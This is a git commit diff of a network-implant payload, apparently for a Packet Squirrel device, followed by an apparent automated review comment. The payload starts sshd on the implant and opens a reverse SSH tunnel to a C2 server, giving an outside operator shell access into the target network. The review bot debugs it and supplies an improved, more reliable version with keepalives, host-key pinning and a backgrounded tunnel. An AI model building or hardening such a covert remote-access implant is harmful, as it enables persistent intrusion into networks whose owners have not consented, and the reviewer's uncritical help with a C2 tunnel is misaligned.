Mostly functional payload, debug functionality added. The SSH connection is initialized, but exits approximately 30 seconds after the start of the connection.
parent
427ca17cd1
commit
a49f410a97
|
@ -7,38 +7,58 @@
|
||||||
# Net Mode: NAT
|
# Net Mode: NAT
|
||||||
# Firmware: 1.2
|
# Firmware: 1.2
|
||||||
#
|
#
|
||||||
#
|
|
||||||
# LED State Descriptions
|
# LED State Descriptions
|
||||||
# Magenta Solid - SSH connecting
|
# Magenta Solid - SSH connecting
|
||||||
# Amber Blink 5 Times - Waiting for user button press
|
# Blue - SSH connection successful
|
||||||
#
|
#
|
||||||
|
|
||||||
# C2 Server address, port and tunnel port
|
# C2 Server address, port and tunnel port
|
||||||
c2_server="192.168.1.123"
|
c2_server="192.168.1.145"
|
||||||
c2_port=22
|
|
||||||
c2_tunnel_port=2222
|
c2_tunnel_port=2222
|
||||||
tunnel_user="username"
|
tunnel_user="username"
|
||||||
# no pass needed, headless mode required so RSA key file is used.
|
# no pass needed, headless mode required so RSA key file is used.
|
||||||
# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
|
# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
|
||||||
|
|
||||||
|
# waiting for button press to start SSH connection.
|
||||||
|
#BUTTON
|
||||||
|
#
|
||||||
|
|
||||||
|
# Magenta indicates SSH connection is launching and the server should have received the connection.
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt
|
||||||
|
|
||||||
# we need an IP, so it'll have to be NAT, unless implanted inline.
|
# we need an IP, so it'll have to be NAT, unless implanted inline.
|
||||||
NETMODE NAT
|
NETMODE NAT
|
||||||
|
sleep 8
|
||||||
|
|
||||||
# amber blinking for button press to launch SSH connection.
|
# debug
|
||||||
LED A BLINK
|
#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt
|
||||||
# waiting for button press to start SSH connection.
|
|
||||||
BUTTON
|
|
||||||
# Green indicates SSH connection has been launched and the server should have received the connection.
|
|
||||||
LED M SOLID
|
|
||||||
|
|
||||||
# -L indicates local port forwarding which tunnels connections to localhost on server to client.
|
# fix file permission problems
|
||||||
|
# chmod 600 id_rsa
|
||||||
|
|
||||||
|
# -R indicates remote port forwarding which tunnels connections to localhost on server to client.
|
||||||
# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
|
# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
|
||||||
# the tunnel port specified on the server to reach the Squirrel.
|
# the tunnel port specified on the server to reach the Squirrel.
|
||||||
|
#
|
||||||
|
# default port is 22
|
||||||
|
echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt
|
||||||
|
|
||||||
# todo: push SSH connection to background to support button kill switch, create optional SSH connection keep-alive.
|
echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt
|
||||||
ssh -L 22:127.0.0.1:$c2_tunnel_port -i id_rsa -p $c2_port $tunnel_user@$c2_server &
|
service sshd start
|
||||||
|
sleep 3
|
||||||
|
|
||||||
# SSH connection failed, target network may be hardened.
|
ssh -R $c2_tunnel_port:127.0.0.1:22 -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server
|
||||||
LED R
|
# echo $ssh_out >> /root/payloads/switch3/debug.txt
|
||||||
NETMODE OFF
|
# ssh_pid=$!
|
||||||
LED FINISH
|
|
||||||
|
echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file
|
||||||
|
# SSH will prompt for verification, and to add host to trusted hosts file.
|
||||||
|
|
||||||
|
#BUTTON 365d && {
|
||||||
|
# kill $ssh_pid
|
||||||
|
#}
|
||||||
|
|
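Review bot: The new `ssh -R $c2_tunnel_port:127.0.0.1:22 ...` line runs in the foreground without `-N`, so it asks the C2 host for an interactive shell that a headless payload has no terminal or stdin to drive, and the script blocks on it — the `Server Connected.` debug line and `LED ATTACK` only execute after ssh has already exited, so they never describe a live tunnel; this is consistent with, though not proven to be, the ~30 second drop the commit message reports. While fixing that, add `-o ExitOnForwardFailure=yes` so a failed remote bind of `$c2_tunnel_port` does not leave a silent, useless session, and pin the C2 host key with `-o UserKnownHostsFile=/root/payloads/switch3/known_hosts -o StrictHostKeyChecking=yes` instead of the manual first-connection workaround described in the WARNING comment; never `StrictHostKeyChecking=no`, which would let anyone on the path impersonate the C2 and land on the reverse-forwarded sshd. The `# chmod 600 id_rsa` line is commented out and relative while the ssh call uses the absolute key path; ssh refuses a group/world-readable private key, so keep an active `chmod 600 /root/payloads/switch3/id_rsa` before the call. The key-generation comment reads `ssh -t rsa -b 2048 -f id_rsa` where `ssh-keygen -t rsa -b 2048 -f id_rsa` is meant. Backgrounding with `&` and capturing `ssh_pid=$!`, as the commented-out lines already intend, is what makes the `BUTTON ... kill $ssh_pid` kill switch workable, and quoting the expansions avoids word-splitting surprises if `tunnel_user` ever contains spaces.
```shell
# … unchanged: LED / NETMODE / debug setup …
chmod 600 /root/payloads/switch3/id_rsa

# -N: no remote shell (nothing to feed it headlessly); keepalives detect a dead peer;
# ExitOnForwardFailure: a failed -R bind is a failure, not a silent idle session;
# known_hosts pinning: verify the C2 host key instead of disabling checking.
ssh -N \
  -o ExitOnForwardFailure=yes \
  -o ServerAliveInterval=15 -o ServerAliveCountMax=3 \
  -o UserKnownHostsFile=/root/payloads/switch3/known_hosts \
  -o StrictHostKeyChecking=yes \
  -R "${c2_tunnel_port}:127.0.0.1:22" \
  -i /root/payloads/switch3/id_rsa \
  "${tunnel_user}@${c2_server}" &
ssh_pid=$!
# … unchanged: Server Connected debug line, LED ATTACK, kill-switch block …
```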